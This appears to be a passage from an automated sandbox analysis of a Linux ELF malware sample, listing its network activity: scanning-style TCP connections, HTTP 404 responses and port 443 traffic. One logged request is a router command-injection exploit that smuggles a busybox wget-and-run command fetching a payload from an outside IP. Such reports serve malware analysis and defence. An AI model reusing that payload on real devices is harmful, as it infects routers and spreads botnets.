              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 203.134.42.158:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.175.115.65:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 101.11.244.247:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 52.167.177.4:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 154.168.157.239:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 99.143.130.47:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 109.109.217.191:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 70.177.68.171:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 48.62.233.204:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 104.229.231.91:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 158.199.188.14:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 82.5.249.238:8080
              Source: /tmp/ZhhHfkNewm.elf (PID: 6206)Socket: 127.0.0.1::45837Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 194.144.128.70
              Source: unknownTCP traffic detected without corresponding DNS query: 189.249.180.181
              Source: unknownTCP traffic detected without corresponding DNS query: 223.208.6.70
              Source: unknownTCP traffic detected without corresponding DNS query: 218.136.192.70
              Source: unknownTCP traffic detected without corresponding DNS query: 143.127.39.32
              Source: unknownTCP traffic detected without corresponding DNS query: 70.31.66.242
              Source: unknownTCP traffic detected without corresponding DNS query: 86.112.197.248
              Source: unknownTCP traffic detected without corresponding DNS query: 165.98.148.254
              Source: unknownTCP traffic detected without corresponding DNS query: 45.170.112.249
              Source: unknownTCP traffic detected without corresponding DNS query: 204.53.175.109
              Source: unknownTCP traffic detected without corresponding DNS query: 159.158.6.156
              Source: unknownTCP traffic detected without corresponding DNS query: 86.135.57.150
              Source: unknownTCP traffic detected without corresponding DNS query: 161.90.103.6
              Source: unknownTCP traffic detected without corresponding DNS query: 5.62.71.144
              Source: unknownTCP traffic detected without corresponding DNS query: 123.253.170.149
              Source: unknownTCP traffic detected without corresponding DNS query: 212.238.166.171
              Source: unknownTCP traffic detected without corresponding DNS query: 212.182.187.4
              Source: unknownTCP traffic detected without corresponding DNS query: 176.237.230.212
              Source: unknownTCP traffic detected without corresponding DNS query: 109.231.126.39
              Source: unknownTCP traffic detected without corresponding DNS query: 169.252.152.123
              Source: unknownTCP traffic detected without corresponding DNS query: 119.153.237.2
              Source: unknownTCP traffic detected without corresponding DNS query: 105.47.250.124
              Source: unknownTCP traffic detected without corresponding DNS query: 18.46.148.92
              Source: unknownTCP traffic detected without corresponding DNS query: 79.114.65.159
              Source: unknownTCP traffic detected without corresponding DNS query: 182.33.46.247
              Source: unknownTCP traffic detected without corresponding DNS query: 219.201.21.169
              Source: unknownTCP traffic detected without corresponding DNS query: 187.136.119.41
              Source: unknownTCP traffic detected without corresponding DNS query: 90.139.109.131
              Source: unknownTCP traffic detected without corresponding DNS query: 97.146.139.242
              Source: unknownTCP traffic detected without corresponding DNS query: 164.151.74.166
              Source: unknownTCP traffic detected without corresponding DNS query: 136.241.99.229
              Source: unknownTCP traffic detected without corresponding DNS query: 125.221.60.23
              Source: unknownTCP traffic detected without corresponding DNS query: 99.168.204.13
              Source: unknownTCP traffic detected without corresponding DNS query: 8.177.244.213
              Source: unknownTCP traffic detected without corresponding DNS query: 142.245.183.133
              Source: unknownTCP traffic detected without corresponding DNS query: 53.78.13.6
              Source: unknownTCP traffic detected without corresponding DNS query: 9.172.129.73
              Source: unknownTCP traffic detected without corresponding DNS query: 5.13.229.40
              Source: unknownTCP traffic detected without corresponding DNS query: 4.63.234.116
              Source: unknownTCP traffic detected without corresponding DNS query: 31.74.172.80
              Source: unknownTCP traffic detected without corresponding DNS query: 204.185.192.157
              Source: unknownTCP traffic detected without corresponding DNS query: 204.78.94.70
              Source: unknownTCP traffic detected without corresponding DNS query: 75.184.54.227
              Source: unknownTCP traffic detected without corresponding DNS query: 62.142.56.6
              Source: unknownTCP traffic detected without corresponding DNS query: 72.80.95.36
              Source: unknownTCP traffic detected without corresponding DNS query: 51.219.97.40
              Source: unknownTCP traffic detected without corresponding DNS query: 212.230.117.179
              Source: unknownTCP traffic detected without corresponding DNS query: 64.53.14.124
              Source: unknownTCP traffic detected without corresponding DNS query: 68.119.168.46
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.74.106
              Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 30 33 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 17:40:54 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 17:41:08 GMTConnection: Close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 00:31:43 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Chunjs/ServerConnection: closeContent-Type: text/htmlContent-Length: 103Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 32 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 72 65 64 22 3e 2f 75 73 72 2f 73 62 69 6e 2f 77 65 62 2f 77 77 77 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 66 6f 6e 74 3e 20 6e 6f 74 20 66 6f 75 6e 64 20 21 3c 2f 68 32 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h2><font color="red">/usr/sbin/web/www/tmUnblock.cgi</font> not found !</h2></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 17:48:06 GMTConnection: Close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 14:16:17 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlCache-Control: publicPragma: cacheExpires: Thu, 21 Dec 2023 18:12:19 GMTDate: Thu, 21 Dec 2023 17:42:19 GMTLast-Modified: Thu, 21 Dec 2023 17:42:19 GMTAccept-Ranges: bytesConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 66 66 66 66 66 66 22 3e 0a 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 68 32 3e 0a 20 20 3c 70 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found</title></head><body bgcolor="ffffff"> <h2>404 Not Found<h2> <p> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Aug 1970 20:46:29 GMTServer: Web ServerConnection: closeData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: 404 Not Found
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 1686Content-Type: text/html; charset=utf-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Thu, 21 Dec 2023 17:42:50 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
              Source: ZhhHfkNewm.elfString found in binary or memory: http://45.142.182.103/bin
              Source: unknownNetwork traffic detected: HTTP traffic on port 39890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40408 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48366 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37226 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48378 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58168 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38552 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37238 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34190 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39420 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35070 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42602 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36358 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38564 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39500
              Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39502
              Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
              Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
              Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
              Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
              Source: unknownNetwork traffic detected: HTTP traffic on port 47004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59482 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
              Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
              Source: unknownNetwork traffic detected: HTTP traffic on port 52898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46148 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58156 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38540 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 32812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
              Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39540
              Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39542
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52512
              Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39468 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
              Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
              Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39546
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39538
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40526
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40524
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
              Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40528
              Source: unknownNetwork traffic detected: HTTP traffic on port 47090 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
              Source: unknownNetwork traffic detected: HTTP traffic on port 44820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40522
              Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52528
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52526
              Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39532
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39534
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52524
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39536
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
              Source: unknownNetwork traffic detected: HTTP traffic on port 58590 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
              Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40516
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39526
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40514
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
              Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40510
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
              Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
